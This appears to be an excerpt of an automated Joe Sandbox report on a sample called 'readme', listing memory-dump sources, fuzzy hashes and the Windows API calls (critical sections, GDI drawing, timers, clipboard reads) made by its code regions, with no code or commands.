                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Long$Create
                                                                                                                                                                                                          • String ID: Dummy$STATIC
                                                                                                                                                                                                          • API String ID: 1733017098-132613206
                                                                                                                                                                                                          • Opcode ID: fd32e9f0fa554accdce7ab5b00cc8db694d7956c6883c39d3d5e1831a2aabb4c
                                                                                                                                                                                                          • Instruction ID: 60c9263fdfddd51d1a46959990d996e43c4a0f9c9599785539e6d357df671051
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd32e9f0fa554accdce7ab5b00cc8db694d7956c6883c39d3d5e1831a2aabb4c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35F0303138471076E630A66ABC06F57B6EC9B59F31F21071AB319F76E0DAE0F8004A2C
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000010,?,00000000,00000000,004EF87C,?,?,004AC02B,?,?), ref: 004F5A80
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F5A8A
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F5B2E
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F5B3D
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000002), ref: 004F5B78
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F5B8A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                          • Opcode ID: 8535169f944d0783d85488a8bb89f9586f38ba5067d93ebdde6dc43345f3772a
                                                                                                                                                                                                          • Instruction ID: 42192e3c7faa4449eaa7148df56c5331408008ed83f87a65c0d534a8c29348b8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8535169f944d0783d85488a8bb89f9586f38ba5067d93ebdde6dc43345f3772a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE41B634300B0D5BD7259F319894BBB77A9AF80704F08415EEB6A8B392DB18FC15D768
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • timeGetTime.WINMM(?,?,?,?,?,?), ref: 004F274C
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,?,?), ref: 004F277D
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 004F2787
                                                                                                                                                                                                          • timeGetTime.WINMM(?,?), ref: 004F2792
                                                                                                                                                                                                          • timeGetTime.WINMM(?,?,?,?,?), ref: 004F27C6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Timetime$CriticalSection$EnterLeave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1404962471-0
                                                                                                                                                                                                          • Opcode ID: a89c063fba00ccfe3890218cc2904d983b2cb644380e86a839d779b6257dffc4
                                                                                                                                                                                                          • Instruction ID: 9d8894fa7cd5c1a3a8d1574b016894ebc4e8e1121a62fd2c9071eafdbb47ea2c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a89c063fba00ccfe3890218cc2904d983b2cb644380e86a839d779b6257dffc4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B531BC35208B049BC314DF25E9956ABB7F1FFC9720F148A2DE4EA83390DB34A419CB56
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(00000378,00000001,00000000), ref: 00529421
                                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,08000041,?,?,00529592,?,?), ref: 00529431
                                                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(00000378,00000001,00000000), ref: 0052943A
                                                                                                                                                                                                          • InterlockedExchange.KERNEL32(00000378,00000000), ref: 0052944F
                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 0052947B
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExchangeInterlocked$Compare$Sleep__aulldiv
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1430435781-0
                                                                                                                                                                                                          • Opcode ID: b59d1b6a3d222f96c2a2779c59a8c3b1568ac668232a9a2a2876ff2baf467b8b
                                                                                                                                                                                                          • Instruction ID: c7c6432b147b16162d76303af8a74e071e756cb34c164aed74e4a8b1f06fd785
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b59d1b6a3d222f96c2a2779c59a8c3b1568ac668232a9a2a2876ff2baf467b8b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C215AB15007409FD7219F2A9844A67FEFCFFA1705F10851FA45A873A1D7B4A904CB64
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5FEB,?,00000000,?,?,00000000,?), ref: 004F5CC0
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CCE
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CDE
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F5D07
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F5D48
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F5D56
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                          • Opcode ID: 8da342b9338abc9bf1cf0fb8044ab95eed2f33d4d982754cc72795221a6dba27
                                                                                                                                                                                                          • Instruction ID: 3111dceef54b192a201187cebb12310cd19e01e5115420dd7c98ed3fae01612e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8da342b9338abc9bf1cf0fb8044ab95eed2f33d4d982754cc72795221a6dba27
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2921A73520174A4BD710AF66E888BFFB7B8EB60305F00852FEB4643251C779A84ADB64
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateSolidBrush.GDI32(?), ref: 004D802E
                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 004D8044
                                                                                                                                                                                                          • FillRect.USER32(?,?,00000000), ref: 004D8067
                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 004D8075
                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004D8078
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Object$Select$BrushCreateDeleteFillRectSolid
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3777265051-0
                                                                                                                                                                                                          • Opcode ID: 3992c7499909c7ac510ee1e8195cc4d617522fd8d389773b43c489c091130502
                                                                                                                                                                                                          • Instruction ID: d8a686452ba02d7e488f009474b8275e6b936404318e954abf19810798465268
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3992c7499909c7ac510ee1e8195cc4d617522fd8d389773b43c489c091130502
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76019A752042046FC304DB69ED88C6B7BF8EACD614B000A5DFA8983312E635E806DB71
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,000007D0,?,?,?,004E515B,?,?,00000000,0041D485), ref: 004E468C
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,0041D485), ref: 004E46A2
                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,000007D0,?,?,?,004E515B,?,?,00000000,0041D485), ref: 004E46D0
                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,004E515B,?,?,00000000,0041D485), ref: 004E46D9
                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,004E515B,?,?,00000000,0041D485), ref: 004E46E6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$Delete$EnterLeave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3104255891-0
                                                                                                                                                                                                          • Opcode ID: 9344d0e21620c09b28f686a70e2872a698c0d1dfac57927c88a57cb864f4338f
                                                                                                                                                                                                          • Instruction ID: c031ed0988ac34fb64eb35ca7992c3622ed3d26c78e5592643255ae209dbdd49
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9344d0e21620c09b28f686a70e2872a698c0d1dfac57927c88a57cb864f4338f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D101D4B750060C5BC2106B35EC81BAF73A8AFC4214F05051EF54F93241DA68B8088BA1
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 004D9C27
                                                                                                                                                                                                          • GetClipboardData.USER32(00000001), ref: 004D9C3A
                                                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 004D9C42
                                                                                                                                                                                                          • GetClipboardData.USER32(00000000), ref: 004D9C4B
                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004D9C56
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Clipboard$Data$CloseOpen
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 464010812-0
                                                                                                                                                                                                          • Opcode ID: 3896003866d9e196f5e942c735a105be1c3c3aad61074d0ab1b34134e7345e92
                                                                                                                                                                                                          • Instruction ID: 2f18cbc0f6c8a3dbd26954e8439ab7c802a903eab365c315afdcc22c9d276e9e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3896003866d9e196f5e942c735a105be1c3c3aad61074d0ab1b34134e7345e92
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41E09AB230022517EB9026BA6C4CF97A2EC9F54F90F050123F604C6340E6A6CC0457B1
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesExA.KERNEL32(?,00000000,?,00000000,2E736D6D,?,?,?,?,?,?,?,?,0041C852,00000000,?), ref: 004CFE0F
                                                                                                                                                                                                            • Part of subcall function 004CB0E0: GetVersionExA.KERNEL32 ref: 004CB0FB
                                                                                                                                                                                                          • GetFileAttributesExW.KERNEL32(00000000,00000000,?,?,?,00000000,2E736D6D,?,?,?,?,?,?,?,?,0041C852), ref: 004CFDAF
                                                                                                                                                                                                          • GetFileAttributesExA.KERNEL32(00000000,00000000,?,2E736D6D,?,?,?,?,?,?,?,?,0041C852,00000000,?,00000000), ref: 004CFDED
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFile$Version
                                                                                                                                                                                                          • String ID: \\?\
                                                                                                                                                                                                          • API String ID: 3849939888-4282027825
                                                                                                                                                                                                          • Opcode ID: f361000200f27e6454158b11577cb5cd6586d4ef8c56bbe8a0e4f20a4d525da9
                                                                                                                                                                                                          • Instruction ID: f991edffad243b4bd670aca913d189ed867c40d808b57564552852d0b3f79ee3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f361000200f27e6454158b11577cb5cd6586d4ef8c56bbe8a0e4f20a4d525da9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6431277A90031067D710AA65AC42FEB73995F85704F54042FF90687352EB6D9C0EC2EA
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,00000000), ref: 004FA67B
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004FA749
                                                                                                                                                                                                            • Part of subcall function 004F9B30: EnterCriticalSection.KERNEL32(?,00000000,?,004FA7A6,?,?,00153804), ref: 004F9B35
                                                                                                                                                                                                            • Part of subcall function 004F9B30: LeaveCriticalSection.KERNEL32(?), ref: 004F9B84
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000100,00000000,00000000,?), ref: 004FA715
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                                                                                                                                                                                          • String ID: FriendlyName
                                                                                                                                                                                                          • API String ID: 904232820-3623505368
                                                                                                                                                                                                          • Opcode ID: 959ce2fe4b047605d4d04147b9c19dc8780e3383a8dda147e2258153261544ba
                                                                                                                                                                                                          • Instruction ID: 4f25218f4a75fa1caa45750efdb6ff353ea89136e06b91a5ad3ed6f7a0914714
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 959ce2fe4b047605d4d04147b9c19dc8780e3383a8dda147e2258153261544ba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A212A75244301AFD220EB54DC49F5BB7F8BF88714F008A1DFA899B290D774F8098BA6
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 004CADB4
                                                                                                                                                                                                          • CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 004CADC8
                                                                                                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 004CADD8
                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 004CADFF
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000017.00000002.1632730835.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632640246.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1632956285.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006E7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.00000000006F5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.0000000000700000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000017.00000002.1633198589.000000000073C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_23_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Create$CompatibleDeleteObjectSection
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3137390749-0
                                                                                                                                                                                                          • Opcode ID: a74e2540195e9566e7a2ac5dffe2e2de3f45b10f51a9d4c1ea3247f6bedff2c4
